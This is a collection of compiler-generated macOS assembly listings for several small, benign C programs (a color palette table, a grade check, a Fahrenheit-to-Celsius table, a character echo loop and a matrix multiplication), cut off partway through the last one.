.short 22359 ## 0x5757
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 22359 ## 0x5757
.short 24407 ## 0x5f57
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 22359 ## 0x5757
.short 26719 ## 0x685f
.short 24424 ## 0x5f68
.short 24415 ## 0x5f5f
.short 24407 ## 0x5f57
.short 24424 ## 0x5f68
.short 24415 ## 0x5f5f
.short 36968 ## 0x9068
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 26719 ## 0x685f
.short 36968 ## 0x9068
.short 24464 ## 0x5f90
.short 24407 ## 0x5f57
.short 24415 ## 0x5f5f
.short 26728 ## 0x6868
.short 37008 ## 0x9090
.short 22367 ## 0x575f
.short 24407 ## 0x5f57
.short 26719 ## 0x685f
.short 36968 ## 0x9068
.short 24464 ## 0x5f90
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 26728 ## 0x6868
.short 37008 ## 0x9090
.short 24424 ## 0x5f68
.short 24407 ## 0x5f57
.short 26719 ## 0x685f
.short 36968 ## 0x9068
.short 24415 ## 0x5f5f
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 26728 ## 0x6868
.short 24415 ## 0x5f5f
.short 22359 ## 0x5757
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 22367 ## 0x575f
.short 24407 ## 0x5f57
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22359 ## 0x5757
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 24407 ## 0x5f57
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 22359 ## 0x5757
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 22359 ## 0x5757
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 22359 ## 0x5757
.short 24407 ## 0x5f57
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 22359 ## 0x5757
.short 26719 ## 0x685f
.short 24424 ## 0x5f68
.short 24415 ## 0x5f5f
.short 24407 ## 0x5f57
.short 24424 ## 0x5f68
.short 24415 ## 0x5f5f
.short 36968 ## 0x9068
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 26719 ## 0x685f
.short 36968 ## 0x9068
.short 24464 ## 0x5f90
.short 24407 ## 0x5f57
.short 24415 ## 0x5f5f
.short 26728 ## 0x6868
.short 37008 ## 0x9090
.short 22367 ## 0x575f
.short 24407 ## 0x5f57
.short 26719 ## 0x685f
.short 36968 ## 0x9068
.short 24464 ## 0x5f90
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 26728 ## 0x6868
.short 37008 ## 0x9090
.short 24424 ## 0x5f68
.short 24407 ## 0x5f57
.short 26719 ## 0x685f
.short 36968 ## 0x9068
.short 24415 ## 0x5f5f
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 26728 ## 0x6868
.short 24415 ## 0x5f5f
.short 22359 ## 0x5757
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 22367 ## 0x575f
.short 24407 ## 0x5f57
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22359 ## 0x5757
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 24407 ## 0x5f57
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 22359 ## 0x5757
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 22359 ## 0x5757
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 22359 ## 0x5757
.short 24407 ## 0x5f57
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 22359 ## 0x5757
.short 26719 ## 0x685f
.short 24424 ## 0x5f68
.short 24415 ## 0x5f5f
.short 22367 ## 0x575f
.short 872 ## 0x368
.short 24415 ## 0x5f5f
.short 36968 ## 0x9068
.short 22367 ## 0x575f
.short 872 ## 0x368
.short 26719 ## 0x685f
.short 36968 ## 0x9068
.short 22367 ## 0x575f
.short 872 ## 0x368
.short 24415 ## 0x5f5f
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 872 ## 0x368
.short 24407 ## 0x5f57
.short 26719 ## 0x685f
.short 22367 ## 0x575f
.short 872 ## 0x368
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 22367 ## 0x575f
.short 872 ## 0x368
.short 24424 ## 0x5f68
.short 24407 ## 0x5f57
.short 22367 ## 0x575f
.short 872 ## 0x368
.short 24415 ## 0x5f5f
.short 22367 ## 0x575f
.short 22367 ## 0x575f
.short 360 ## 0x168
.short 39367 ## 0x99c7
.short 39321 ## 0x9999
.short 39321 ## 0x9999
.short 37792 ## 0x93a0
.short 26823 ## 0x68c7
.short 26728 ## 0x6868
.short 26728 ## 0x6868
.short 22376 ## 0x5768
.short 26823 ## 0x68c7
.short 26728 ## 0x6868
.short 26728 ## 0x6868
.short 22376 ## 0x5768
.short 26823 ## 0x68c7
.short 55912 ## 0xda68
.short 26777 ## 0x6899
.short 22376 ## 0x5768
.short 26823 ## 0x68c7
.short 39272 ## 0x9968
.short 22425 ## 0x5799
.short 22376 ## 0x5768
.short 26823 ## 0x68c7
.short 26728 ## 0x6868
.short 22359 ## 0x5757
.short 22376 ## 0x5768
.short 26772 ## 0x6894
.short 26728 ## 0x6868
.short 26728 ## 0x6868
.short 22376 ## 0x5768
.short 22298 ## 0x571a
.short 22359 ## 0x5757
.short 22359 ## 0x5757
.short 22359 ## 0x5757
.short 39328 ## 0x99a0
.short 39321 ## 0x9999
.short 39321 ## 0x9999
.short 37792 ## 0x93a0
.short 26777 ## 0x6899
.short 26728 ## 0x6868
.short 26728 ## 0x6868
.short 22376 ## 0x5768
.short 26777 ## 0x6899
.short 26728 ## 0x6868
.short 26728 ## 0x6868
.short 22376 ## 0x5768
.short 26777 ## 0x6899
.short 55912 ## 0xda68
.short 26777 ## 0x6899
.short 22376 ## 0x5768
.short 26777 ## 0x6899
.short 39272 ## 0x9968
.short 22425 ## 0x5799
.short 22376 ## 0x5768
.short 26777 ## 0x6899
.short 26728 ## 0x6868
.short 22359 ## 0x5757
.short 22376 ## 0x5768
.short 26777 ## 0x6899
.short 26728 ## 0x6868
.short 26728 ## 0x6868
.short 22376 ## 0x5768
.short 22376 ## 0x5768
.short 22359 ## 0x5757
.short 22359 ## 0x5757
.short 22359 ## 0x5757
.globl _Main_Scene_BackgroundPal ## @Main_Scene_BackgroundPal
.p2align 2
_Main_Scene_BackgroundPal:
.short 0 ## 0x0
.short 4228 ## 0x1084
.short 4262 ## 0x10a6
.short 7399 ## 0x1ce7
.short 322 ## 0x142
.short 4421 ## 0x1145
.short 3493 ## 0xda5
.short 422 ## 0x1a6
.short 455 ## 0x1c7
.short 4582 ## 0x11e6
.short 6598 ## 0x19c6
.short 8455 ## 0x2107
.short 1225 ## 0x4c9
.short 5290 ## 0x14aa
.short 2093 ## 0x82d
.short 3119 ## 0xc2f
.short 6350 ## 0x18ce
.short 4456 ## 0x1168
.short 4395 ## 0x112b
.short 490 ## 0x1ea
.short 4522 ## 0x11aa
.short 1292 ## 0x50c
.short 2349 ## 0x92d
.short 3405 ## 0xd4d
.short 4396 ## 0x112c
.short 5452 ## 0x154c
.short 5423 ## 0x152f
.short 9512 ## 0x2528
.short 11595 ## 0x2d4b
.short 14763 ## 0x39ab
.short 12684 ## 0x318c
.short 14798 ## 0x39ce
.short 20769 ## 0x5121
.short 21826 ## 0x5542
.short 19815 ## 0x4d67
.short 19847 ## 0x4d87
.short 25029 ## 0x61c5
.short 26086 ## 0x65e6
.short 27111 ## 0x69e7
.short 19784 ## 0x4d48
.short 20874 ## 0x518a
.short 23021 ## 0x59ed
.short 515 ## 0x203
.short 8711 ## 0x2207
.short 3593 ## 0xe09
.short 554 ## 0x22a
.short 7688 ## 0x1e08
.short 682 ## 0x2aa
.short 5832 ## 0x16c8
.short 7913 ## 0x1ee9
.short 621 ## 0x26d
.short 7756 ## 0x1e4c
.short 4845 ## 0x12ed
.short 5775 ## 0x168f
.short 7855 ## 0x1eaf
.short 11882 ## 0x2e6a
.short 12907 ## 0x326b
.short 12939 ## 0x328b
.short 16110 ## 0x3eee
.short 7946 ## 0x1f0a
.short 6957 ## 0x1b2d
.short 8013 ## 0x1f4d
.short 4942 ## 0x134e
.short 27143 ## 0x6a07
.short 29222 ## 0x7226
.short 32487 ## 0x7ee7
.short 17934 ## 0x460e
.short 18990 ## 0x4a2e
.short 19023 ## 0x4a4f
.short 24077 ## 0x5e0d
.short 30280 ## 0x7648
.short 32331 ## 0x7e4b
.short 29417 ## 0x72e9
.short 25102 ## 0x620e
.short 29292 ## 0x726c
.short 32364 ## 0x7e6c
.short 32397 ## 0x7e8d
.short 32430 ## 0x7eae
.short 32463 ## 0x7ecf
.short 17167 ## 0x430f
.short 29449 ## 0x7309
.short 29450 ## 0x730a
.short 30540 ## 0x774c
.short 31597 ## 0x7b6d
.short 32654 ## 0x7f8e
.short 4181 ## 0x1055
.short 4279 ## 0x10b7
.short 3378 ## 0xd32
.short 4464 ## 0x1170
.short 4435 ## 0x1153
.short 1489 ## 0x5d1
.short 2513 ## 0x9d1
.short 6578 ## 0x19b2
.short 7634 ## 0x1dd2
.short 341 ## 0x155
.short 4404 ## 0x1134
.short 3540 ## 0xdd4
.short 4597 ## 0x11f5
.short 6551 ## 0x1997
.short 9520 ## 0x2530
.short 10577 ## 0x2951
.short 8627 ## 0x21b3
.short 8690 ## 0x21f2
.short 12690 ## 0x3192
.short 8663 ## 0x21d7
.short 14805 ## 0x39d5
.short 15862 ## 0x3df6
.short 5240 ## 0x1478
.short 6297 ## 0x1899
.short 7354 ## 0x1cba
.short 5338 ## 0x14da
.short 9468 ## 0x24fc
.short 7480 ## 0x1d38
.short 3423 ## 0xd5f
.short 5437 ## 0x153d
.short 4479 ## 0x117f
.short 6591 ## 0x19bf
.short 8539 ## 0x215b
.short 9720 ## 0x25f8
.short 11581 ## 0x2d3d
.short 8638 ## 0x21be
.short 8703 ## 0x21ff
.short 6864 ## 0x1ad0
.short 7764 ## 0x1e54
.short 8723 ## 0x2213
.short 8724 ## 0x2214
.short 880 ## 0x370
.short 7024 ## 0x1b70
.short 914 ## 0x392
.short 5008 ## 0x1390
.short 5043 ## 0x13b3
.short 4020 ## 0xfb4
.short 980 ## 0x3d4
.short 4054 ## 0xfd6
.short 7768 ## 0x1e58
.short 6683 ## 0x1a1b
.short 7770 ## 0x1e5a
.short 666 ## 0x29a
.short 4760 ## 0x1298
.short 4827 ## 0x12db
.short 7775 ## 0x1e5f
.short 732 ## 0x2dc
.short 4860 ## 0x12fc
.short 10777 ## 0x2a19
.short 8762 ## 0x223a
.short 8794 ## 0x225a
.short 11899 ## 0x2e7b
.short 12891 ## 0x325b
.short 14970 ## 0x3a7a
.short 10938 ## 0x2aba
.short 10780 ## 0x2a1c
.short 8831 ## 0x227f
.short 10847 ## 0x2a5f
.short 13948 ## 0x367c
.short 14972 ## 0x3a7c
.short 10940 ## 0x2abc
.short 11997 ## 0x2edd
.short 10943 ## 0x2abf
.short 11999 ## 0x2edf
.short 12957 ## 0x329d
.short 15004 ## 0x3a9c
.short 12990 ## 0x32be
.short 15006 ## 0x3a9e
.short 14047 ## 0x36df
.short 1821 ## 0x71d
.short 3868 ## 0xf1c
.short 3933 ## 0xf5d
.short 831 ## 0x33f
.short 1887 ## 0x75f
.short 3967 ## 0xf7f
.short 4893 ## 0x131d
.short 4957 ## 0x135d
.short 5983 ## 0x175f
.short 3999 ## 0xf9f
.short 12093 ## 0x2f3d
.short 14270 ## 0x37be
.short 16912 ## 0x4210
.short 20080 ## 0x4e70
.short 20082 ## 0x4e72
.short 21138 ## 0x5292
.short 21140 ## 0x5294
.short 24309 ## 0x5ef5
.short 23254 ## 0x5ad6
.short 26192 ## 0x6650
.short 28305 ## 0x6e91
.short 27315 ## 0x6ab3
.short 30386 ## 0x76b2
.short 27318 ## 0x6ab6
.short 31445 ## 0x7ad5
.short 20338 ## 0x4f72
.short 21331 ## 0x5353
.short 21395 ## 0x5393
.short 23477 ## 0x5bb5
.short 32593 ## 0x7f51
.short 32659 ## 0x7f93
.short 25366 ## 0x6316
.short 31510 ## 0x7b16
.short 32660 ## 0x7f94
.short 32726 ## 0x7fd6
.short 17117 ## 0x42dd
.short 17118 ## 0x42de
.short 18203 ## 0x471b
.short 17402 ## 0x43fa
.short 18301 ## 0x477d
.short 17183 ## 0x431f
.short 19327 ## 0x4b7f
.short 17311 ## 0x439f
.short 19391 ## 0x4bbf
.short 26425 ## 0x6739
.short 26457 ## 0x6759
.short 27480 ## 0x6b58
.short 28539 ## 0x6f7b
.short 32600 ## 0x7f58
.short 32634 ## 0x7f7a
.short 32666 ## 0x7f9a
.short 29564 ## 0x737c
.short 27615 ## 0x6bdf
.short 29596 ## 0x739c
.short 32767 ## 0x7fff
.space 74
.subsections_via_symbols
| the_stack_data/211080537.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
add x8, sp, #8
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
ldr w8, [sp, #8]
subs w8, w8, #90
cset w8, le
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB0_3
LBB0_2:
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB0_3
LBB0_3:
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _system
mov w0, #0
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "\350\274\270\345\205\245\346\225\264\346\225\270\351\253\224\351\207\215:"
l_.str.1: ; @.str.1
.asciz "%d"
l_.str.2: ; @.str.2
.asciz "\351\253\224\351\207\215\351\201\216\351\207\215\343\200\202\n"
l_.str.3: ; @.str.3
.asciz "\344\270\215\346\234\203\351\201\216\351\207\215\343\200\202\n"
l_.str.4: ; @.str.4
.asciz "pause"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -8(%rbp), %rsi
movb $0, %al
callq _scanf
cmpl $90, -8(%rbp)
jle LBB0_2
## %bb.1:
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_3
LBB0_2:
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
LBB0_3:
leaq L_.str.4(%rip), %rdi
callq _system
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "\350\274\270\345\205\245\346\225\264\346\225\270\351\253\224\351\207\215:"
L_.str.1: ## @.str.1
.asciz "%d"
L_.str.2: ## @.str.2
.asciz "\351\253\224\351\207\215\351\201\216\351\207\215\343\200\202\n"
L_.str.3: ## @.str.3
.asciz "\344\270\215\346\234\203\351\201\216\351\207\215\343\200\202\n"
L_.str.4: ## @.str.4
.asciz "pause"
.subsections_via_symbols
| the_stack_data/22012580.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur wzr, [x29, #-16]
mov w8, #300
stur w8, [x29, #-20]
mov w8, #20
str w8, [sp, #24]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldur s0, [x29, #-16]
scvtf s0, s0
stur s0, [x29, #-8]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur s0, [x29, #-8]
ldur s1, [x29, #-20]
scvtf s1, s1
fcmp s0, s1
cset w8, hi
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur s0, [x29, #-8]
bl _f2c
stur s0, [x29, #-12]
ldur s0, [x29, #-8]
fcvt d1, s0
ldur s0, [x29, #-12]
fcvt d0, s0
mov x8, sp
str d1, [x8]
str d0, [x8, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
ldur s0, [x29, #-8]
ldr s1, [sp, #24]
scvtf s1, s1
fadd s0, s0, s1
stur s0, [x29, #-8]
b LBB0_1
LBB0_3:
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ; -- Begin function f2c
lCPI1_0:
.quad 0x3fe1c71c71c71c72 ; double 0.55555555555555558
lCPI1_1:
.quad 0x4040000000000000 ; double 32
.section __TEXT,__text,regular,pure_instructions
.globl _f2c
.p2align 2
_f2c: ; @f2c
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str s0, [sp, #12]
ldr s0, [sp, #12]
fcvt d0, s0
adrp x8, lCPI1_1@PAGE
ldr d1, [x8, lCPI1_1@PAGEOFF]
fsub d1, d0, d1
adrp x8, lCPI1_0@PAGE
ldr d0, [x8, lCPI1_0@PAGEOFF]
fmul d0, d0, d1
fcvt s0, d0
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz " F C\n"
l_.str.1: ; @.str.1
.asciz "%3.0f %6.1f\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movl $0, -16(%rbp)
movl $300, -20(%rbp) ## imm = 0x12C
movl $20, -24(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
cvtsi2ssl -16(%rbp), %xmm0
movss %xmm0, -8(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movss -8(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtsi2ssl -20(%rbp), %xmm0
ucomiss %xmm1, %xmm0
jb LBB0_3
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
callq _f2c
movss %xmm0, -12(%rbp)
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -12(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
leaq L_.str.1(%rip), %rdi
movb $2, %al
callq _printf
movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtsi2ssl -24(%rbp), %xmm1
addss %xmm1, %xmm0
movss %xmm0, -8(%rbp)
jmp LBB0_1
LBB0_3:
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function f2c
LCPI1_0:
.quad 0x3fe1c71c71c71c72 ## double 0.55555555555555558
LCPI1_1:
.quad 0x4040000000000000 ## double 32
.section __TEXT,__text,regular,pure_instructions
.globl _f2c
.p2align 4, 0x90
_f2c: ## @f2c
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movss %xmm0, -4(%rbp)
movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
subsd %xmm0, %xmm1
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
mulsd %xmm1, %xmm0
cvtsd2ss %xmm0, %xmm0
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz " F C\n"
L_.str.1: ## @.str.1
.asciz "%3.0f %6.1f\n"
.subsections_via_symbols
| the_stack_data/43888109.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/97973.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
bl _getchar
str w0, [sp, #8]
adds w8, w0, #1
cset w8, eq
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr w0, [sp, #8]
bl _putchar
b LBB0_1
LBB0_3:
mov x9, sp
mov x8, #-1
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "End of file (%d)\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
callq _getchar
movl %eax, -8(%rbp)
cmpl $-1, %eax
je LBB0_3
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -8(%rbp), %edi
callq _putchar
jmp LBB0_1
LBB0_3:
leaq L_.str(%rip), %rdi
movl $4294967295, %esi ## imm = 0xFFFFFFFF
movb $0, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "End of file (%d)\n"
.subsections_via_symbols
| the_stack_data/372885.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _mm ; -- Begin function mm
.p2align 2
_mm: ; @mm
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
str x0, [sp, #72]
str x1, [sp, #64]
str x2, [sp, #56]
str w3, [sp, #52]
str wzr, [sp, #48]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
; Child Loop BB0_5 Depth 3
ldr w8, [sp, #48]
ldr w9, [sp, #52]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_12
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
str wzr, [sp, #44]
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_5 Depth 3
ldr w8, [sp, #44]
ldr w9, [sp, #52]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_10
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
movi d0, #0000000000000000
str d0, [sp, #32]
str wzr, [sp, #28]
b LBB0_5
LBB0_5: ; Parent Loop BB0_1 Depth=1
; Parent Loop BB0_3 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #28]
ldr w9, [sp, #52]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=3
ldr x8, [sp, #72]
ldr w9, [sp, #48]
ldr w10, [sp, #52]
mul w9, w9, w10
ldr w10, [sp, #28]
add w9, w9, w10
ldr d0, [x8, w9, sxtw #3]
str d0, [sp, #16]
ldr x8, [sp, #64]
ldr w9, [sp, #28]
ldr w10, [sp, #52]
mul w9, w9, w10
ldr w10, [sp, #44]
add w9, w9, w10
ldr d0, [x8, w9, sxtw #3]
str d0, [sp, #8]
ldr d0, [sp, #16]
ldr d1, [sp, #8]
ldr d2, [sp, #32]
fmadd d0, d0, d1, d2
str d0, [sp, #32]
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=3
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_5
LBB0_8: ; in Loop: Header=BB0_3 Depth=2
ldr d0, [sp, #32]
ldr x8, [sp, #56]
ldr w9, [sp, #48]
ldr w10, [sp, #52]
mul w9, w9, w10
ldr w10, [sp, #44]
add w9, w9, w10
str d0, [x8, w9, sxtw #3]
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_3 Depth=2
ldr w8, [sp, #44]
add w8, w8, #1
str w8, [sp, #44]
b LBB0_3
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #48]
add w8, w8, #1
str w8, [sp, #48]
b LBB0_1
LBB0_12:
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov w8, #2000
stur w8, [x29, #-8]
ldur w8, [x29, #-8]
ldur w9, [x29, #-8]
mul w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsl x0, x8, #3
bl _malloc
stur x0, [x29, #-16]
ldur w8, [x29, #-8]
ldur w9, [x29, #-8]
mul w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsl x0, x8, #3
bl _malloc
str x0, [sp, #24]
ldur w8, [x29, #-8]
ldur w9, [x29, #-8]
mul w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsl x0, x8, #3
bl _malloc
str x0, [sp, #16]
str wzr, [sp, #12]
b LBB1_1
LBB1_1: ; =>This Loop Header: Depth=1
; Child Loop BB1_3 Depth 2
ldr w8, [sp, #12]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_8
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
str wzr, [sp, #8]
b LBB1_3
LBB1_3: ; Parent Loop BB1_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #8]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_6
b LBB1_4
LBB1_4: ; in Loop: Header=BB1_3 Depth=2
ldr s1, [sp, #12]
; implicit-def: $d0
fmov s0, s1
sshll.2d v0, v0, #0
; kill: def $d0 killed $d0 killed $q0
scvtf d0, d0
ldur x8, [x29, #-16]
ldr w9, [sp, #12]
ldur w10, [x29, #-8]
mul w9, w9, w10
ldr w10, [sp, #8]
add w9, w9, w10
str d0, [x8, w9, sxtw #3]
ldr s1, [sp, #8]
; implicit-def: $d0
fmov s0, s1
sshll.2d v0, v0, #0
; kill: def $d0 killed $d0 killed $q0
scvtf d0, d0
ldr x8, [sp, #24]
ldr w9, [sp, #12]
ldur w10, [x29, #-8]
mul w9, w9, w10
ldr w10, [sp, #8]
add w9, w9, w10
str d0, [x8, w9, sxtw #3]
ldr x8, [sp, #16]
ldr w9, [sp, #12]
ldur w10, [x29, #-8]
mul w9, w9, w10
ldr w10, [sp, #8]
add w9, w9, w10
movi d0, #0000000000000000
str d0, [x8, w9, sxtw #3]
b LBB1_5
LBB1_5: ; in Loop: Header=BB1_3 Depth=2
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB1_3
